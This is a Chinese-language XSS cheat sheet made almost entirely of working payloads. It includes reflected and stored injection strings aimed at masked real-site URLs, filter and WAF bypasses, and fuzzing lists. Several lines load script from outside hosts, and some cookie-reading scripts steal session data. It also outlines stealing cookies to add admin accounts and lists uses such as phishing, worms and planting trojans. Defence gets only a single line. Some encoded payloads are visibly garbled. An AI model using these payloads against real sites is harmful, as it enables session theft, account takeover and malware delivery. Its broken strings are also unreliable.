应用安全-Web安全-XSS(跨站攻击)攻防整理

储存型 - Payload - 2020/05/17

javas&Tab;cript:alert()

x onerror=s=createElement('script');body.appendChild(s);s.src='XSSURL';   #图片链接处

分类

反射型 存储型  DOM型  XSF（Flash XSS） PDFXSS MHTML协议跨站(MHTML,data)  字符编码（UTF-7 XSS）

富文本编辑器测试 - 输入框

<img SRC="http://www.baidu.com/" STYLE="xxx:expressio/*\0*/n(if(!window.x){alert('xss');window.x=1;})" ALT="" />   #style过滤不足 IE6环境

<img src= alt="hello,xss＂onerror=alert(1);//">  #发表日志处

反射型
(1)<script>alert(1)</script>

(2)%%3E%3Cscript%3Ealert%/insight/%%3C/script%3E
(3)">%3Cscript%3Ealert%28/document.cookie/%29%3C/script%3E
(4)%3Cscript%3Ealert%28%27s%27%29;%3C/script%3E
(5)</SCRIPT><SCRIPT>alert("B0mbErM@n");</SCRIPT>

(6)--"><SCRIPT>alert("B0mbErM@n");</SCRIPT> -- 接路径后

（7）http://xx.xx.com.cn/front/register.jsp?lang="onerror=alert(document.cookie)%20"

存储型

</a>javascript:alert(/x/) #如相册名称填写处

<iframe/src=javascript:alert(document.cookie);>  #如上传视频后填写视频信息，在视频简介处插入

XSS -> 得到用户Cookie -》 登录网站后台 -》 通过越权漏洞添加管理员账号

测试浏览器： IE8 | IE9和Opera 关闭XSS filter | firefox 17.0.5

无回显XSS - burp - Collaborator

<script src="collaborator生成的随机url"></script>

XSS:

http://movie.x.com/type,area/a"><BODY ONLOAD=alert(188)>,1/

http://movie.x.com/type,area/a%22%3E%3CBODY%20ONLOAD=alert%28188%29%3E,1/

http://t.x.com.cn/pub/tags/"><script>alert(1)</script>

http://t.x.com.cn/pub/tags/%2522%253E%253Cscript%253Ealert(1)%253C%252Fscript%253E

http://t.x.com/tag/');alert(1)<!--

http://123.x.com/dianping/?aaaaaaaaaa"><script>alert(/wooyun/)</script>

http://t.x.com/p/worldcup?g=1"><script>alert(document.domain)</script>

http://shaft.jebe.x.com/show?a=a<script>alert(1)</script>&r=http://www.renren.com&type=single

http://help.x.com/mutually_help_null.shtml?query=<script>alert(1)</script>

http://www.x.com/Product/SearchNew.aspx?new=1&k=aaa<script>alert('xss')</script>

http://t.x.com/p/city?s=44&c=3"><script>alert(1)</script><"

http://search.x.com/bk.jsp?title="><script>alert(1)</script><"

http://wap.x.com/sogou/go2map/?pg=GMINDEX&position="><script>alert(1)</script><"

http://**.**.**.**/api/db/dbbak.php?apptype=1%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22

http://product.x.com/simp_search.php?manuid=0&keyword=</script><script>alert(42)</script>&bgcolor=ffffff

http://play.x.com.cn/list.php?keyword=<script>alert('xss');</script>&keywords=title&x=10&y=10

http://login.x.com.cn/hd/signin.php?act=1&reference='"><script>alert("xss");</script><"&entry=sso®_entry=space

http://www.x.com/websnapshot?url='"><script>alert("我又来了—小黑");</script><"&did=093e5e25b67f3688-24a8d6236dd

http://passport.x.com/matrix/getMyCardAction.do?url='"><script>alert(9122430);</script><"&chenmi=0&macval=&hmac=

http://mail.x.com/?userid=&appid='"><script>alert(15551700);</script><"&ru=

http://toolbox.x.com/searchcode/iframe?style=4&domain='"><script>alert(15551700);</script><"

http://www.x.net/pharmacysystem.php?page="><script>alert(15551700);</script>&Proceed_=1

http://game.x.tv/astd_register.php?preurl=http://game.pps.tv/astd_register.php&cf="><script>alert(15551700);</script>

http://movies.x.com/movie_search.php?type=xss';"<script>alert(188)</script>&keyword=1

http://movies.x.com/movie_search.php?type=xss%27;%22%3Cscript%3Ealert%28188%29%3C/script%3E&keyword=1

http://movies.x.com/movie_search.php?type=search&keyword=</title><script>alert(/anyunix/)</script>

http://movies.x.com/movie_search.php?type=search&keyword=%3C/title%3E%3Cscript%3Ealert%28/anyunix/%29%3C/script%3E

http://passport.x.com/web/updateInfo.action?modifyType=';alert(/aa/);a='

http://passport.x.com/web/updateInfo.action?modifyType=%27;alert%28/aa/%29;a=%27

http://www.x.com/rp/uiserver2.asp?action=<script>alert(/xss/)</script>

http://cang.x.com/do/add?it=&iu=!--></script><script>alert(/xss/)</script>

http://cang.x.com/do/add?it=&iu=<script>alert(/xss/);</script>

http://**.**.**.**/diannao/?类型=&query=<script>alert(/xss/);</script>&cater=diannao

http://x.tv/cookie.php?act=login_tmp&success_callback="><div%20style="xss:expression(window.x?0:(eval(String.fromCharCode(97,108,101,114,116,40,39,120,115,115,39,41)),window.x=1));"></div>

http://x.com.cn/api/get_from_data.php?sid=48302&jsoncallback=jsonp1282643851243'<script>alert('s')</script>s&_=1282643881152

http://x.m.moxiu.com/index.php?do=Phone.List&fid=1&t=8<script>alert('s');</script>

http://x.sina.com.cn/list.php?client=13&clientname=<script>alert('s');</script>

http://bj.x.com/bjhcg/stock/friendkchz.asp?tp=10&group="></iframe><script>alert(/XSS/);</script>

http://hk.x.com/gtja_Report/Report/Search.aspx?type="></iframe><script>alert(/XSS/);</script>

http://hksrv1.x.com/kf.php?keyword=&arg=gtjahk&style=1\0\"\'><ScRiPt>alert(/XSS/);</ScRiPt>

http://hk2.x.com/english/gtja_Report/Report/MarketCVList.aspx?type=0&key=" style="XSS:expression(alert(/XSS/))"

http://8.show.x.com.cn/room/space.php?sid=1000040123&tab=2';</script><script>alert('by pandora ');</script><script>

http://passport.x.com/fastreg/regs1.jsp?style=black"></iframe><script>alert("pow78781");</script>

http://cgi.video.x.com/v1/user/userinfo?u=611991217;alert(/ss/)

http://t.x.com/session?username="><script>alert("xss")</script>\&password=xss&savelogin=1234

http://v.x.com/result.html?word=asdf<img src=1 onerror=alert(1)>&submit=百度一下&type=0

http://b2b.x.com/search/search.jsp?shangji=3&query=<script>alert(document.cookie)</script>

http://login.x.com.cn/sso/login.php?callback=alert(String.fromCharCode(120,115,115,101,114));//&returntype=IFRAME

http://t.x.com.cn/ajaxlogin.php?framelogin=1&callback=var aa='&retcode=101';alert('xsser');var bb='({&reason=';<!--

http://sms.x.com/GGBJ/login.php?phone=sefrefwe" /><script>alert(/ss/);</script><!--

http://tuan.x.com/beijing/life/?promoteid='"><script>alert(565902);</script><"

http://chat.x.com/robot/repositoryBrowse.jsp?title=</TITLE><body onload=alert(999)>

http://cp.x.com/login.asp?language='"><script>alert(7001645);</script><"

http://hi.x.com/?origURL='"><script>alert(123);</script><"&loginregFrom=index&ss=10101

https://auth.x.com/login/index.htm?support=&CtrlVersion=&loginScene=&personalLoginError=&goto='"><script>alert(7263974);</script><"&password=&REMOTE_PCID_NAME=_seaside_gogo_pcid&_seaside_gogo_pcid=&_seaside_gogo_=&_seaside_gogo_p=&checkCode=1111

http://game.x.tv/astd_register.php?preurl=http://game.pps.tv/astd_register.php&cf="><script>alert(9631676);</script>

http://reg.x.com/xn6205.do?ss=a&rt=a&g=');location='https://baidu.com';//

富文本框上传图片处，抓包，POST请求：

msg=分享图片&act=insertTwitter&pic=http://up2.upload.x.com/"abc/123/onerror=alert(); xxx.png

msg=%u5206%u4EAB%u56FE%u7247&act=insertTwitter&pic=http://up2.upload.x.com/"abc/123/onerror=alert(); xxx.png

富文本 - 以源码方式编辑提交 STYLE标签未过滤 - IE6,,

<img SRC="http://www.x.com/" STYLE="xxx:expressio/*\0*/n(if(!window.x){alert('xss');window.x=1;})" ALT="" />

富文本编辑发表处：

<img src= alt="hello,xss＂onerror=alert(1);//">

文本框：

<script>alert(//)</script>

<script>alert(/xss/)</script>

<script>alert("XSS")</script>

</style><script>alert(/xss/)</script>

<script>alert()</script>

"><script>alert(/a/);</script>

<script>alert(document.cookie)</script>  --如在帖子签名处插入-》论坛发帖-》弹窗

</script><script>alert()</script>

WooYun<img src='' onerror=alert(/poc/)>

'"><script>alert(111);</script><"

<img src="x" onerror="alert(1)">

anyunix"/></div></div></div><BODY ONLOAD=alert('anyunix')>

 "><script>alert(1)</script><"     --贴吧发帖回帖标题处

 >><<script>alert(/xss/)</script><

 新建相册专辑，名称及描述处输入"><script>alert(1)</script><" -> 以后编辑该相册时触发

 --文章标题处

 <script>alert('s')</script>

 <script>alert(/xss/)</script>

 '"><script>alert("url");</script><"  --插入链接文本框

anyunix</textarea></div></div><BODY ONLOAD=alert('anyunix')></textarea>   --签名处

个人空间的“修改样式”功能，只是在保存前做了js判断，并没有对实质内容进行过滤，导致持久型xss。(expression(alert()) 在IE6,IE8下测试通过，此处有字数限制)

'"><script>alert("pow78781");</script>   ---注册时用户名处

"><script src="http://www.***.com/test.js" type="text/javascript"></script>

可在个人博客首页执行js代码

详细说明：

使用自定义模板时插入javascript，未进行任何检查过滤。直接location.href转向即可将访问者博客（登录状态时）的博文、评论等隐藏

漏洞证明：

编辑自定义代码，如head区域，插入

<script>http://www.x.com/user/service.php?op=poststatus&blogid=***&id=***&Status=0</script>

个人空间DIY时可以使用expression,IE6、IE7测试通过

全角字符形式ｅｘｐｒｅｓｓｉｏｎ表达式未被过滤。而全角字符形式的ｅｘｐｒｅｓｓｉｏｎ能够被IE6解析并执行，因此，该漏洞可能导致使用IE .0访问sohu邮箱的用户遭受XSS攻击，如在邮箱处插入文本：

<DIV STYLE="width: ｅxpression(alert('XSS'));">

邮箱 - 发件人姓名

填写</script><script>alert()</script>

邮箱 - 发件箱邮件正文 - Style标签未过滤：

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

邮件正文：

<div style="width:exp/****/ression(alert('xsser'))">xsser</div>

.用QQ邮箱A给QQ邮箱B发邮件，收件人，标题填好后，对邮件正文内容做一次这样的操作：用邮件编辑器自带的插入图片功能，插入一个“网络照片”（地址随便写，asdf也没关系），之后在编辑器中该“插入的图片”的后面，输入任意html代码即可，如<script>alert()</script>，发送

.B收到邮件意图回复该邮件，点击回复时出现弹框

图片上传处：

<img src="javascript:alert(/xxxs/)">  --仅影响IE6

图片名称（利用js进行CSRF）：

<script src=.js></script>

<script src=http://***.com/*.js>

在图片中插入JS -》 上传 - 》 显示：

<img src="" onerror="XSS" />

在附件中插入JS -》 上传 -》 显示：

<style> body{ width:expression(alert(/xss/)) } </style>

搜索处：

<script>alert(/xxx/)</script>

"><script>alert()</script>

"><script>alert(/新浪手机跨站/)</script><

"><iframe src=http://www.baidu.com></iframe>

'"><script>alert("小黑来跨站");</script><"

<iframe src=https://www.baidu.com </iframe>

<iframe src=https://www.baidu.com width=500 height=90></iframe>

aa</title></head><script>alert('乖乖');</script>

" onFocus="alert('十九楼跨站')

外部导入：

css导入：

@import url(http://**.**.**.**/1.css); 包含远程css文件，可以在1.css中写入XSS利用.

$str = preg_replace($filter, '', $str); //过滤是过滤了，但只用于判断，没对源输入起作用

if(preg_match("/(expression|implode|javascript)/i", $str)) {  //并没有对import、http等进行检测

code 区域

/(expression|vbscript|javascript|import)/i   IE6,IE7,IE8通过.

js文件导入：

http://cnmail0.x.x.com.cn/classic/rdMail.php?cb=1,</script><script src="http://XX.com/s.js"></script><script>

http://t.x.com.cn/ajaxlogin.php?framelogin=1&callback=document.all[3].src='http://xss.com/xss.js';</script><!--

http://123.x.com/dianping/?"><SCRIPT/*/SRC='http://ha.ckers.org/xss.js'>

页面跳转触发：

服务器端存在对参数的过滤不严，导致可以通过在参数中提交带有JavaScript代码恶意url，在进行页面跳转时（如从搜索页面进入换肤）触发漏洞

http://www.x.com/search?q=beyond&"><script>alert('ok')</script>

漏洞触发

code 区域

http://www.x.com/skinchooser?back_url=http://www.x.com/search?q=beyond&"><script>alert('ok')</script>

Flash XSS

swf:

</script><!--><meta http-equiv="refresh" content="3;url=http://www.google.com.hk"><!--http://www.1.swf-->.swf  (链接地址栏中输入)

链接地址：

mp3链接（链接地址栏中输入）：

gHK【DBA】--><script language="javascript" type="text/javascript" src="http://js.users.51.la/4209140.js"></script><!--跨站.mp3 

url链接地址栏中导入js文件：

'<!--><script language="javascript" type="text/javascript" src="http://js.users.51.la/4209140.js"></script><!--

绕过长度限制：

（）Post提交表单：

</title><script>alert(//)</script>

绕过' " 等字符实现跳转 -》会自动转到 http://www.hao123.com

http://cgi.x.x.com/v1/user/userinfo?u=611991217;var str=window.location.href;var es=/url=/;es.exec(str);var right=RegExp.rightContext;window.location.href=right&url=http://www.hao123.com

作用：

()实现网页自动跳转刷新

http://down.tech.x.com.cn/download/search.php?f_name=0;URL=http://www.geovisioncn.com/news" http-equiv="refresh" \\\

()获取敏感数据

XSS与邮箱同域，在邮件中诱使用户点击可获取邮件列表、通讯录等

()post发送Ajax修改个人资料，如修改邮箱为可操作的邮箱，然后密码找回账号盗号

()获取管理员账号(管理员后台查看JS脚本)

()钓鱼

()蠕虫

条件：.同域 .登录状态

防御：

PHP：

htmlspecialchars

常用构造方法整理

<sCript>alert(1)</scRipt>    #使用的正则不完善或者是没有用大小写转换函数
&lt;script&gt;alert(/xss/)&lt;/script&gt; #多用于地址栏
%253Cimg%2520src%253D1%2520onerror%253Dalert%25281%2529%253E   #多重url编码绕过
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 120, 115, 115, 39, 41))</script>    #字符转ascii（unicode）十进制编码绕过
<scr<script>rip>alalertert</scr</script>rip>   #拼凑法（利用waf的不完整性，只验证一次字符串或者过滤的字符串并不完整）
"onmousemove="alert(&#;xss&#;)
</textarea><script>alert('xss')</script> 

<img scr= onerror=alert('xss')>      #当找不到图片名为1的文件时，执行alert('xss')  

<a href=javascrip:alert('xss')>s</a>  #点击s时运行alert('xss')  

<iframe src=javascript:alert('xss');height= width= /></iframe>   #利用iframe的scr来弹窗  

"><script>onclick=alert(1)</script>

<a href="#" onclick="alert(1)">s</a>

<script>eval(location.hash.substr())</script>#alert('xss')

<p>Sanitizing <img src=""INVALID-IMAGE" onerror='location.href="http://too.much.spam/"'>!</p>

"<svg/onload=confirm(document.domain)>

a"><svg/onload=prompt(1)>

"></iframe><script>alert('OPEN BUG BOUNTY');</script>

<button onfocus=alert(/xss/) autofocus>     #需要点击button才能执行

<img src=x onerror=window.alert() >

<img src=x onerror=window[‘al’%2B’ert’]() >

<img src=x onerror=_=alert,_(/xss/) >

<img src=x onerror=_=alert;_(/xss/) >

<img src=x onerror=_=alert;x=;_(/xss/) >

<body/onload=document.write(String.fromCharCode(,,,,,,,,,,,,,,,,,,,,,,,,))>

<sCrIpt srC=http://xss.tf/eeW></sCRipT>

"<body/onload=document.write(String.fromCharCode(60,115,67,114,73,112,116,32,115,114,67,61,104,116,116,112,58,47,47,120,115,115,46,116,102,

,,,,,,,,,,,,,))>"    #对地址进行ascii编码，IE不支持String.fromCharCode

<img src=x onerror=javascript:'.concat('alert()>    #IE、XSS Auditor均无法绕过

javascript://%250Aalert(1)    #重定向+服务端对url两次解码（对url验证：PHP的filter_var或filter_input函数的FILTER_VALIDATE_URL）

javascript://%0Aalert(1)    #重定向+服务端对url解码（对url验证：PHP的filter_var或filter_input函数的FILTER_VALIDATE_URL）

javascript://%0A1?alert(1):0    #三目运算符

javascript://baidu.com/%0A1?alert(1):0    #三目运算符

<svg onload=alert()>    #字符长度固定-》构造伪造字符    
<script%20src%3D"http%3A%2F%2F0300.0250.0000.0001"><%2Fscript> #ascii八进制编码绕过
<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>  #字符转ascii十六进制编码绕过 
<svg onload=javascript:alert(1) xmlns="https://www.test.com">       
<iframe src="java script:alert(1)" height=0 width=0 /><iframe> #webkit过滤规则绕过
<script>alert('xss')</script>
" onclick="alert('xss')
<script src="http://xss8.pw/bgFfBx?1419229565"></script> （加载js文件）
<script>confirm(/v587/)</script>
'"()&%<acx><ScRiPt>alert(/xss/)</ScRiPt>
'";alert(1);//
'";alert(/xsss/)//
zaq'onmouseover=prompt(1)&gt
<svg/onload=alert(1)>
/index.jsp?vendor_id=";alert(/xss/)<!--

字段绕过方法整理

" autofocus onfocus=alert(1) x="   #尖括号绕过/input标签中

name=javascript:alert() autofocus onfocus=location=this.name   #尖括号绕过/input标签中

location=url编码模式可将括号写为% %   #()绕过

this.name传值绕过   #单引号'绕过

<SCRIPT>a=//alert(a.source)</SCRIPT>   #单引号、双引号、分号绕过|尖括号、等号没法绕过

<script>{onerror=alert}throw </script>  #引号、分号绕过

<script>eval(String.fromCharCode(, , , , , , , , , , , ))</script>   #单引号、双引号、分号绕过|尖括号没法绕过

<<SCRIPT>a=//alert(a.source)//<</SCRIPT>   #<script>、单双引号、分号绕过|等号没法绕过

<a href="javascript:alert('xss')">link</a>  #javascript绕过
<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>  #alert绕过

可绕过IE浏览器检测，无法绕过XSS Auditor检测构造方法整理

<img src= onerror=alert(document.domain)>

<video src= onerror=alert(/xss/)>

<audio src=x onerror=alert(/xss/)>

<body/onfocus=alert(/xss/)>

<input autofocus onfocus=alert()> #需点击触发

<svg onload=location=alert()>

<svg onload=javascript:alert()>

<button onfocus=prompt() autofocus> #需点击触发

<select autofocus onfocus=prompt()> #需点击触发

"<svg/onload=alert(1)>"@x.y 针对邮件地址检测构造XSS（if(!filter_var($email, FILTER_VALIDATE_EMAIL))）

<script>alert('xss')</script><svg/onload=setTimeout(alert())><img src= onerror=constructor.constructor(alert())>

<img src= onerror=[].map(alert)>

<img src= onerror=[].filter(alert)>

<img src= onerror=alert(document.domain)>

<svg/onload=setTimeout(String.fromCharCode(,,,,,,,))>

<body/onload=document.write(String.fromCharCode(,,,,,,,,,,,>  #对<script>alert()</script>ascii编码

<body/onfocus=_=alert,_()>

利用details | 目前只有 Chrome, Safari 6+, 和 Opera 15+ 浏览器支持 | chrome Auditor无法绕过" | eval拦截可对alert(1) 八进制编码

<details open ontoggle=top.alert()>

<details open ontoggle=top['alert']()>

<details open ontoggle=top[‘prompt’]()>

<details open ontoggle=top[‘al’%2b’ert’]()>

<details open ontoggle=top.eval(‘ale’%2B’rt()’) >

<details open ontoggle=top.eval(‘ale’%2B’rt()’) >

<details open ontoggle=eval(‘alert()’) >

<details open ontoggle=eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029') >

<details open ontoggle=eval(atob(‘YWxlcnQoMSk=’)) >

<details open ontoggle=\u0065val(atob(‘YWxlcnQoMSk=’)) >

<details open ontoggle=%%%%6c(atob(‘YWxlcnQoMSk=’)) >    "

<details open ontoggle=eval('%61%6c%65%72%74%28%31%29') >

<details open ontoggle=eval(‘\\\\\\\\’) >

<details open ontoggle=eval(String.fromCharCode(,,,,,,,)) >

#外部url，运用基于DOM的方法创建和插入节点把外部JS文件注入到网页并进行url编码

<details open ontoggle=eval(“appendChild(createElement(‘script’)).src=’http://xss.tf/eeW'”)>

<details open ontoggle=eval(%%%%%6e%%%%%6c%%%%%%%%%%6c%%6d%%6e%%%%%%%%%%%%%2e%%%%3d%%%%%%3a%2f%2f%%%%2e%%%2f%%%%) >

绕过检测规则/waf方法整理

客户端绕过 - waf部署在客户端上，利用burp、fiddler绕过

USER-Agent伪造绕过 - 对百度、google、soso、360等爬虫请求不过滤的情况下

cookie构造绕过 - $_REQUEST接受get post cookie，waf过滤GET POST

IP代理绕过 - 网站显示IP或浏览器，可对IP、user-agent进行构造，在PHP里X_FORWARDED_FOR和HTTP_CLIENT_IP两个获取IP的函数可被修改

插件绕过 - 过任意waf/支持跨域

编码绕过 - HTML、Unicode、URL、ASCII、JS编码、base64

字符实体绕过

利用webkit过滤规则绕过

参数污染绕过（主要用于搜索引擎）
   http://127.0.0.1:631/admin/?kerberos=onmouseover=alert(1)&kerberos

注释符绕过

input1#value: "><script>alert(/xss/);<script/>

外部引入css脚本绕过

结合服务器编码语言绕过

配合代码逻辑绕过

编码语言漏洞/框架漏洞  - 如 Jquery 中 html()方法 -  Apache||Nginx访问日志攻击

     a.cn/test/?text=<script>alert(1)</script>   #Nginx，后端Apache

外部引入css脚本整理

<!DOCTYPE HTML>

<html>

<head>

<style>

@import url("malicious.css");

</style>

<title>TEST</title>

<meta charset="utf-8">

</head>

<body >

 There is a will!

</body>

</html>

body{

 color:expression(alert('xss'));

}

移动端构造方法整理

#ontouch*handlers

<body ontouchstart=alert()>

<body ontouchend=alert()>

<body ontouchmove=alert()>

Cookie绕过整理

Cookie中添加

style: wrewrwrwrwrafas"><script>alert(1)</script><!--

配合代码逻辑绕过整理

');%0a}%0d}%09alert();/*anything here*/if(true){//anything here%0a('

');}}alert();if(true){('

场景

function example(age, subscription){

    if (subscription){

        if (age > ){

            another_function('');}}alert();if(true){('');

        }

    else{

        console.log('Requirements not met.');

    }

}

执行 -》

function example(age, subscription){

if (subscription){

if (age > ){

another_function('');

}

}

alert();

if (true){

('');

}

else{

console.log('Requirements not met.');

工具篇

XSpear

利用篇

插入恶意代码 - 工具 - 桂林老兵cookie欺骗
  <img src=x onerror=appendChild(createElement('script')).src='js_url' /> 

第三方劫持 (外调J/C)

XSS downloader

XCS

页面渲染XSS

跨域攻击

挖矿

DDOS攻击

获取Cookie

内网IP端口存活主机信息获取

截屏

获取后台地址（存储型XSS）

挂马

（1）反射型 - %3Ciframe+src%3Dhttp%3A%2F%2Fwww.tkwoo.com+width%3D0+height%3D0%3E%3C%2Fiframe%3E+

Fuzzing篇

<svg onload=alert(1)>"><svg onload=alert(1)//

"onmouseover=alert(1)//

"autofocus/onfocus=alert(1)//

'-alert(1)-'

'-alert(1)//

\'-alert(1)//

</script><svg onload=alert()>

<x contenteditable onblur=alert()>lose focus! 

<x onclick=alert()>click this! 

<x oncopy=alert()>copy this! 

<x oncontextmenu=alert()>right click this! 

<x oncut=alert()>copy this! 

<x ondblclick=alert()>double click this! 

<x ondrag=alert()>drag this! 

<x contenteditable onfocus=alert()>focus this! 

<x contenteditable oninput=alert()>input here! 

<x contenteditable onkeydown=alert()>press any key! 

<x contenteditable onkeypress=alert()>press any key! 

<x contenteditable onkeyup=alert()>press any key! 

<x onmousedown=alert()>click this! 

<x onmousemove=alert()>hover this! 

<x onmouseout=alert()>hover this! 

<x onmouseover=alert()>hover this! 

<x onmouseup=alert()>click this! 

<x contenteditable onpaste=alert()>paste here!

<script>alert()// 

<script>alert()<!–

<script src=//brutelogic.com.br/1.js> 

<script src=//3334957647/1>

%3Cx onxxx=alert() 

<% onxxx= 

<x %6Fnxxx= 

<x o%6Exxx= 

<x on%78xx= 

<x onxxx%3D1

<X OnXxx= 

<x onxxx= onxxx=1

<x/onxxx= 

<x%09onxxx= 

<x%0Aonxxx= 

<x%0Conxxx= 

<x%0Donxxx= 

<x%2Fonxxx= 

<x =''onxxx= 

<x =""onxxx=1

<x </onxxx= 

<x =">" onxxx= 

<http://onxxx%3D1/

<x onxxx=alert() ='

<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},)>

'onload=alert(1)><svg/1='

'>alert(1)</script><script/1=' 

*/alert()</script><script>/*

*/alert()">'onload="/*<svg/1='

`-alert(1)">'onload="`<svg/1='

*/</script>'>alert(1)/*<script/1='

<script>alert()</script> 

<script src=javascript:alert()> 

<iframe src=javascript:alert()> 

<embed src=javascript:alert()> 

<a href=javascript:alert()>click 

<math><brute href=javascript:alert()>click 

<form action=javascript:alert()><input type=submit> 

<isindex action=javascript:alert() type=submit value=click> 

<form><button formaction=javascript:alert()>click 

<form><input formaction=javascript:alert() type=submit value=click> 

<form><input formaction=javascript:alert() type=image value=click> 

<form><input formaction=javascript:alert() type=image src=SOURCE> 

<isindex formaction=javascript:alert() type=submit value=click> 

<object data=javascript:alert()> 

<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;)&gt;> 

<svg><script xlink:href=data:,alert() /> 

<math><brute xlink:href=javascript:alert()>click 

<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>

<html ontouchstart=alert()> 

<html ontouchend=alert()> 

<html ontouchmove=alert()> 

<html ontouchcancel=alert()>

<body onorientationchange=alert()>

"><img src=1 onerror=alert(1)>.gif

<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>

GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;

<script src="data:&comma;alert(1)//

"><script src=data:&comma;alert(1)//

<script src="//brutelogic.com.br&sol;1.js&num; 

"><script src=//brutelogic.com.br&sol;1.js&num; 

<link rel=import href="data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; 

"><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;

<base href=//0>

<script/src="data:&comma;eval(atob(location.hash.slice(1)))//#alert(1)

<body onload=alert()>

<body onpageshow=alert()>

<body onfocus=alert()>

<body onhashchange=alert()><a href=#x>click this!#x

<body style=overflow:auto;height:1000px onscroll=alert() id=x>#x

<body onscroll=alert()><br><br><br><br>
<body onresize=alert()>press F12!

<body onhelp=alert()>press F1! (MSIE)

<marquee onstart=alert()>

<marquee loop= width= onfinish=alert()>

<audio src onloadstart=alert()>

<video onloadstart=alert()><source>

<input autofocus onblur=alert()>

<keygen autofocus onfocus=alert()>

<form onsubmit=alert()><input type=submit>

<select onchange=alert()><option><option>2

<menu id=x contextmenu=x onshow=alert()>right click me!

alert``

alert&lpar;&rpar;

alert(&#x29

alert&#;&#41

(alert)()

a=alert,a()

[].find(alert)

top["al"+"ert"]()

top[/al/.source+/ert/.source]()

al\u0065rt()

top['al\145rt']()

top['al\x65rt']()

top[..toString()]()

navigator.vibrate()

eval(URL.slice(-))>#alert()

eval(location.hash.slice()>#alert()

innerHTML=location.hash>#<script>alert()</script>

'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E

<<scr\0ipt/src=http://xss.com/xss.js></script

%%--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%%3C%2Fscript%3E

' onmouseover=alert(/XSS/)

"><iframe%20src="http://google.com"%%203E

'<script>window.onload=function(){document.forms[0].message.value='';}</script>

x”</title><img src%3dx onerror%3dalert()>

<script> document.getElementById(%22safe123%).setCapture(); document.getElementById(%22safe123%).click(); </script>

<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>

<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[]) };xhr.send();</script>

<script>(function() {var event = document.createEvent(%22MouseEvents%);event.initMouseEvent(%22click%, true, true, window, , , , , , false, false, false, false, , null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>

<script>var script = document.getElementsByTagName('script')[]; var clone = script.childNodes[].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[])</script>

<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%);xhr.open(%22GET%,%/xssme2%,true);xhr.onreadystatechange=function(){if(xhr.readyState==%%26xhr.status==){alert(xhr.responseText.match(/'([^']%2b)/)[])}};xhr.send();</script>

<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[])</script>

<script>alert(document.getElementsByTagName('html')[].innerHTML.match(/'([^']%2b)/)[])</script>

<%%%%%%> % = %%6f%%%6d%%6e%%2e%%%%%%%%6c%%6d%%6e%(%%%%%); %%2e%%%%%6e%%%%%6c%(%%6f%%%6d%%6e%%2e%%%%%2e%%6c%6f%6e%%4e%6f%%(%%%%)); %%6c%%%(%%2e%%6e%6e%%%%%4d%4c%2e%6d%%%%(%%%6f%6f%6b%% = '(%2e%2a%3f)'%)[%]); </%%%%%%>

<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%);  xdr.open(%22get%, %/xssme2%3Fa=%, true); xdr.onreadystatechange = function() { try{   var c;   if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) )    alert(c[]); }catch(e){} };  xdr.send(); </script>

<iframe id=%22ifra% src=%/%></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%<scr% %2b %22ipt>top.foo = Object.defineProperty</scr% %2b %22ipt>%); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() {    return document.cookie }}); alert(Safe.get());</script>

<script>alert(document.head.innerHTML.substr(,));</script>

<script>alert(document.head.childNodes[].text)</script>

<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == ){alert(request.responseText.substr(,));}</script>

<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script>

<script>x=document.createElement(%22iframe%);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>

<script>x=document.createElement(%22iframe%);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>

<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%); } } xmlHttp.send(null); }; </script>

